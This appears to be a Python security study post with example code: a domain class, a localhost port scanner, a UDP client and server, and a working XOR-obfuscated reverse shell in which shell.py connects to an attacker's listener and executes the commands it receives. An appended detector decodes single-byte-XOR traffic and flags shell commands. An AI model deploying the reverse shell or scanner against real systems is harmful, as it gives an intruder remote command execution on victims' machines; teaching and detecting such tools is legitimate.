fb.python-study.1
Source: Internet  Published by: 火妹网络  Editor: 程序博客网  Time: 2024/05/18 09:03
0x01. Python classes
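    #coding=utf-8
    import subprocess

    class Domain:
        def __init__(self, domain, port, protocol):
            self.domain = domain
            self.port = port
            self.protocol = protocol

        def URL(self):
            # Build the base URL from protocol, host and port
            if self.protocol == 'https':
                URL = 'https://' + self.domain + ':' + self.port + '/'
            elif self.protocol == 'http':
                URL = 'http://' + self.domain + ':' + self.port + '/'
            else:
                raise ValueError("unsupported protocol: " + self.protocol)
            return URL

        def lookup(self):
            # Run the system "host" utility with an argument list (no shell),
            # so the domain string cannot inject extra commands
            subprocess.call(["host", self.domain])

    if __name__ == "__main__":
        domain = Domain('www.freebuf.com', '80', 'http')
        print domain.URL()
        print domain.port
        print domain.protocol
        domain.lookup()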
Output:

    root@kali:~/Desktop# python ./test.py
    http://www.freebuf.com:80/
    80
    http
    www.freebuf.com has address 123.151.180.21

Environment: Kali + Python 2.7.3
0x02 Port scan
I enabled SSH on the local machine, i.e. port 22. A simple demonstration.
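    #coding=utf-8
    import socket

    ports = [21, 22, 53, 80, 443, 445, 3389, 5050, 5678, 8080, 8081]
    hosts = ['127.0.0.1']

    for host in hosts:
        for port in ports:
            try:
                s = socket.socket()
                print "[+]Attempting to connect to " + host + ":" + str(port)
                s.connect((host, port))
                # Send some junk followed by a newline to provoke a reply
                s.send('adsfsafdsfadfsadfasdfasdfas \n')
                # No timeout is set, so recv() blocks if the service never answers
                banner = s.recv(1024)
                if banner:
                    print "[+]" + host + ":" + str(port) + " open: \n" + banner
                s.close()
            except socket.error:
                # Closed or unreachable port: move on to the next one
                pass

Result: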
    root@kali:~/Desktop# python ./scan.py
    [+]Attempting to connect to 127.0.0.1:21
    [+]Attempting to connect to 127.0.0.1:22
    [+]127.0.0.1:22 open:
    SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2
    [+]Attempting to connect to 127.0.0.1:53
    [+]Attempting to connect to 127.0.0.1:80
    [+]Attempting to connect to 127.0.0.1:443
    [+]Attempting to connect to 127.0.0.1:445
    [+]Attempting to connect to 127.0.0.1:3389
    [+]Attempting to connect to 127.0.0.1:5050
    [+]Attempting to connect to 127.0.0.1:5678
    [+]Attempting to connect to 127.0.0.1:8080
    [+]Attempting to connect to 127.0.0.1:8081
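This is only a sample program and not a practical one: when it scans a service that does not both recv and send, it hangs on recv.
0x03 Reverse Shell
A simple UDP server and client (server-client.py):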
    #coding=utf-8
    import socket

    host = ''
    port = 1024
    bufsize = 128
    addr = (host, port)

    udp_server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_server.bind(addr)

    while True:
        print 'waiting for message...'
        data, addr = udp_server.recvfrom(bufsize)
        print '...received from and return to:' + str(addr) + ": " + data

    udp_server.close()

    #coding=utf-8
    import socket

    host = 'localhost'
    port = 1024
    bufsize = 128
    addr = (host, port)

    udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    while True:
        data = raw_input('>')
        if not data:
            break
        udp_client.sendto(data, addr)

    udp_client.close()
Next is a demonstration program for a reverse shell.
attacker.py
    #coding=utf-8
    import socket

    """Create a socket and listen on the port"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", 443))
    s.listen(2048)
    print "Listening on port 443... "

    # Accept the connection from the compromised host
    (client, (ip, port)) = s.accept()
    print " received connection from : ", ip

    while True:
        command = raw_input('~$ ')
        encode = bytearray(command)
        for i in range(len(encode)):
            encode[i] ^= 0x41
        client.send(encode)  # send
        en_data = client.recv(2048)  # recv
        decode = bytearray(en_data)
        for i in range(len(decode)):
            decode[i] ^= 0x41
        print decode

    client.close()
    s.close()
shell.py
    #!/usr/bin/python
    import socket, subprocess, sys

    RHOST = sys.argv[1]
    RPORT = 443
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((RHOST, RPORT))

    while True:
        # receive XOR encoded data from network socket
        data = s.recv(1024)
        # XOR the data again with a '\x41' to get back to normal data
        en_data = bytearray(data)
        for i in range(len(en_data)):
            en_data[i] ^= 0x41
        # Execute the decode data as a command.
        # The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable
        comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
        comm.wait()
        STDOUT, STDERR = comm.communicate()
        print STDERR
        # Encode the output and send to RHOST
        en_STDOUT= bytearray(STDOUT)
        for i in range(len(en_STDOUT)):
            en_STDOUT[i] ^= 0x41
        s.send(en_STDOUT)

    s.close()
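From this we can see that the attacker opens port 443 on their own machine; running shell.py on the victim then makes the victim machine connect to the attacker's machine. It uses the subprocess module to execute the commands sent by the attacker and sends the victim machine's command output back to the attacker's machine. It is roughly equivalent to a remote shell, though not a fully standard interactive shell. (Getting a shell through an nc reverse connection.)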
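The 0x41 XOR used by attacker.py and shell.py only obscures the traffic; anyone inspecting a captured payload can undo it by trying all 256 key bytes. The following is an added example, not part of the original post, written for Python 3 (the listings above are Python 2.7); the token list and the sample payloads are assumptions constructed for illustration.

```python
# Added example, Python 3: recover single-byte-XOR payloads for traffic inspection.
import string

PRINTABLE = frozenset(string.printable.encode("ascii"))
# Assumed, illustrative token list: fragments typical of shell commands and their output.
SHELL_TOKENS = (b"uname", b"whoami", b"ls ", b"cat ", b"/etc/", b"/bin/", b"uid=", b"gid=")


def xor_bytes(data, key):
    """XOR every byte with one key byte, the same transform the page's scripts apply."""
    return bytes(b ^ key for b in data)


def printable_ratio(data):
    return sum(b in PRINTABLE for b in data) / len(data) if data else 0.0


def token_hits(data):
    return sum(tok in data for tok in SHELL_TOKENS)


def recover_single_byte_xor(payload, min_printable=0.95):
    """Try all 256 keys; return (key, plaintext, hits) for the candidate that is
    almost fully printable and contains the most shell tokens, or None."""
    best = None
    for key in range(256):
        plain = xor_bytes(payload, key)
        if printable_ratio(plain) < min_printable:
            continue
        hits = token_hits(plain)
        if hits and (best is None or hits > best[2]):
            best = (key, plain, hits)
    return best


# Constructed sample payloads (not captured traffic).
SAMPLE_COMMAND = xor_bytes(b"cat /etc/passwd", 0x41)
SAMPLE_REPLY = xor_bytes(b"uid=0(root) gid=0(root) groups=0(root)\n", 0x41)
SAMPLE_OTHER = bytes(range(200, 232))  # printable under key 0x80, but no shell tokens

if __name__ == "__main__":
    samples = [("command", SAMPLE_COMMAND), ("reply", SAMPLE_REPLY), ("other", SAMPLE_OTHER)]
    for name, payload in samples:
        result = recover_single_byte_xor(payload)
        if result is None:
            print(name, "-> not flagged")
        else:
            key, plain, hits = result
            print("%s -> key 0x%02x, %d token(s): %r" % (name, key, hits, plain))
```

Requiring both a high printable ratio and at least one token keeps payloads that merely become printable under some key (the third sample) from being flagged.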